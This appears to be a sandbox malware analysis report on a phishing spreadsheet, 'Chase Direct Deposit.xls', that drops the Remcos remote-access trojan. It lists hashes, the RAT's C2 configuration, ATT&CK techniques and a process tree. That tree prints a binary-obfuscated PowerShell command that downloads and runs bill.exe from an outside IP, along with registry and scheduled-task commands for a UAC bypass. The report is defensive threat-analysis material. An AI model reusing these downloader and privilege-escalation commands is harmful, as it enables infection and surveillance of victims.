Overview

overview

10

Static

static

8

Chase Dire...it.xls

windows7_x64

10

Chase Dire...it.xls

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    182s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    25-08-2021 20:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Chase Direct Deposit.xls

  • Size

    116KB

  • MD5

    89da2874a518638c7f5ec30a286f4167

  • SHA1

    c766aba3be2f450a8059b4754fed706730321f4d

  • SHA256

    4816d1e51c489e591d7d3d9aeba4cb7a494a97f27bba7a90d45bbe0e1b85a829

  • SHA512

    390e3e89026436fff0fa646cc111df980cc5f5ef29b4c3ee1f857de426e643d10bf77f469424ab17a500dd8b575d62af5dea34d42c36a6ab905674c04797c21d

Score
10/10
remcosaugustapersistencerat

Malware Config

Extracted

Family

remcos

Version

3.2.0 Pro

Botnet

Augusta

C2

twistednerd.dvrlists.com:8618

Attributes
  • audio_folder

    MicRecords

  • audio_path

    %AppData%

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • install_path

    %AppData%

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    Augusta-LF4SC3

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

  • take_screenshot_title

    notepad;solitaire;

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Chase Direct Deposit.xls"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1648
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,00110001,00111001,00111000,00101110,00110010,00110011,00101110,00110010,00110101,00110001,00101110,00110001,00110001,00110000,00101111,01100010,01101001,01101100,01101100,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01100010,01101001,01101100,01101100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00111011,00100100,01010100,01000011,00111101,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00111011,01001001,01000101,01011000,00101000,00100100,01010100,01000011,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01100010,01101001,01101100,01101100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1564
      • C:\Users\Admin\AppData\Local\Temp\bill.exe
        "C:\Users\Admin\AppData\Local\Temp\bill.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1276
        • C:\Users\Admin\AppData\Local\Temp\bill.exe
          C:\Users\Admin\AppData\Local\Temp\bill.exe
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          PID:652
          • C:\Windows\SysWOW64\mobsync.exe
            C:\Windows\System32\mobsync.exe
            5⤵
              PID:2332
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Public\Trast.bat" "
              5⤵
                PID:2364
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
                  6⤵
                    PID:2404
                    • C:\Windows\SysWOW64\reg.exe
                      reg delete hkcu\Environment /v windir /f
                      7⤵
                      • Modifies registry key
                      PID:2436
                    • C:\Windows\SysWOW64\reg.exe
                      reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
                      7⤵
                      • Modifies registry key
                      PID:2448
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                      7⤵
                        PID:2472
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ""C:\Users\Public\nest.bat" "
                    5⤵
                      PID:2508
                      • C:\Windows\SysWOW64\reg.exe
                        reg delete hkcu\Environment /v windir /f
                        6⤵
                        • Modifies registry key
                        PID:2540

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Initial Access

            Execution

            Persistence

            Registry Run Keys / Startup Folder

            1
            T1060

            Privilege Escalation

            Defense Evasion

            Modify Registry

            3
            T1112

            Credential Access

            Discovery

            Query Registry

            1
            T1012

            System Information Discovery

            1
            T1082

            Lateral Movement

            Collection

            Exfiltration

            Command and Control

            Impact

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\bill.exe
              MD5

              27ee757d743631d49dcb3c6d7c90dfbe

              SHA1

              2b356d2090ea481e38fdf1e78dac05b74c4818f0

              SHA256

              dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

              SHA512

              871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\bill.exe
              MD5

              27ee757d743631d49dcb3c6d7c90dfbe

              SHA1

              2b356d2090ea481e38fdf1e78dac05b74c4818f0

              SHA256

              dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

              SHA512

              871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\bill.exe
              MD5

              27ee757d743631d49dcb3c6d7c90dfbe

              SHA1

              2b356d2090ea481e38fdf1e78dac05b74c4818f0

              SHA256

              dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

              SHA512

              871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

              Download Submit
            • C:\Users\Public\Trast.bat
              MD5

              4068c9f69fcd8a171c67f81d4a952a54

              SHA1

              4d2536a8c28cdcc17465e20d6693fb9e8e713b36

              SHA256

              24222300c78180b50ed1f8361ba63cb27316ec994c1c9079708a51b4a1a9d810

              SHA512

              a64f9319acc51fffd0491c74dcd9c9084c2783b82f95727e4bfe387a8528c6dcf68f11418e88f1e133d115daf907549c86dd7ad866b2a7938add5225fbb2811d

              Download Submit
            • C:\Users\Public\UKO.bat
              MD5

              eaf8d967454c3bbddbf2e05a421411f8

              SHA1

              6170880409b24de75c2dc3d56a506fbff7f6622c

              SHA256

              f35f2658455a2e40f151549a7d6465a836c33fa9109e67623916f889849eac56

              SHA512

              fe5be5c673e99f70c93019d01abb0a29dd2ecf25b2d895190ff551f020c28e7d8f99f65007f440f0f76c5bcac343b2a179a94d190c938ea3b9e1197890a412e9

              Download Submit
            • C:\Users\Public\nest.bat
              MD5

              8ada51400b7915de2124baaf75e3414c

              SHA1

              1a7b9db12184ab7fd7fce1c383f9670a00adb081

              SHA256

              45aa3957c29865260a78f03eef18ae9aebdbf7bea751ecc88be4a799f2bb46c7

              SHA512

              9afc138157a4565294ca49942579cdb6f5d8084e56f9354738de62b585f4c0fa3e7f2cbc9541827f2084e3ff36c46eed29b46f5dd2444062ffcd05c599992e68

              Download Submit
            • \Users\Admin\AppData\Local\Temp\bill.exe
              MD5

              27ee757d743631d49dcb3c6d7c90dfbe

              SHA1

              2b356d2090ea481e38fdf1e78dac05b74c4818f0

              SHA256

              dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

              SHA512

              871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

              Download Submit
            • \Users\Admin\AppData\Local\Temp\bill.exe
              MD5

              27ee757d743631d49dcb3c6d7c90dfbe

              SHA1

              2b356d2090ea481e38fdf1e78dac05b74c4818f0

              SHA256

              dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

              SHA512

              871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

              Download Submit
            • \Users\Admin\AppData\Local\Temp\bill.exe
              MD5

              27ee757d743631d49dcb3c6d7c90dfbe

              SHA1

              2b356d2090ea481e38fdf1e78dac05b74c4818f0

              SHA256

              dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

              SHA512

              871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

              Download Submit
            • memory/652-106-0x0000000000330000-0x0000000000331000-memory.dmp
              Filesize

              4KB

              Download
            • memory/652-102-0x00000000001B0000-0x00000000001B1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/652-99-0x0000000000000000-mapping.dmp
              Download
            • memory/1276-103-0x0000000010410000-0x000000001042B000-memory.dmp
              Filesize

              108KB

              Download
            • memory/1276-95-0x00000000001B0000-0x00000000001B1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1276-92-0x0000000000000000-mapping.dmp
              Download
            • memory/1564-71-0x0000000004950000-0x0000000004951000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1564-69-0x0000000004982000-0x0000000004983000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1564-88-0x000000007EF30000-0x000000007EF31000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1564-87-0x0000000006280000-0x0000000006281000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1564-80-0x0000000006490000-0x0000000006491000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1564-79-0x0000000005720000-0x0000000005721000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1564-74-0x00000000056B0000-0x00000000056B1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1564-89-0x0000000006520000-0x0000000006521000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1564-70-0x0000000002590000-0x0000000002591000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1564-64-0x0000000000000000-mapping.dmp
              Download
            • memory/1564-68-0x0000000004980000-0x0000000004981000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1564-67-0x00000000049C0000-0x00000000049C1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1564-66-0x0000000001E50000-0x0000000001E51000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1564-65-0x0000000076641000-0x0000000076643000-memory.dmp
              Filesize

              8KB

              Download
            • memory/1648-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
              Filesize

              64KB

              Download
            • memory/1648-60-0x000000002F471000-0x000000002F474000-memory.dmp
              Filesize

              12KB

              Download
            • memory/1648-61-0x00000000716D1000-0x00000000716D3000-memory.dmp
              Filesize

              8KB

              Download
            • memory/1648-63-0x0000000005E40000-0x0000000005F50000-memory.dmp
              Filesize

              1.1MB

              Download
            • memory/2332-107-0x0000000000000000-mapping.dmp
              Download
            • memory/2332-116-0x00000000000C0000-0x00000000000C1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/2332-115-0x0000000000080000-0x0000000000081000-memory.dmp
              Filesize

              4KB

              Download
            • memory/2332-117-0x0000000000160000-0x0000000000161000-memory.dmp
              Filesize

              4KB

              Download
            • memory/2332-119-0x0000000010590000-0x000000001060C000-memory.dmp
              Filesize

              496KB

              Download
            • memory/2332-120-0x0000000000300000-0x0000000000379000-memory.dmp
              Filesize

              484KB

              Download
            • memory/2364-109-0x0000000000000000-mapping.dmp
              Download
            • memory/2404-111-0x0000000000000000-mapping.dmp
              Download
            • memory/2436-113-0x0000000000000000-mapping.dmp
              Download
            • memory/2448-114-0x0000000000000000-mapping.dmp
              Download
            • memory/2472-118-0x0000000000000000-mapping.dmp
              Download
            • memory/2508-121-0x0000000000000000-mapping.dmp
              Download
            • memory/2540-123-0x0000000000000000-mapping.dmp
              Download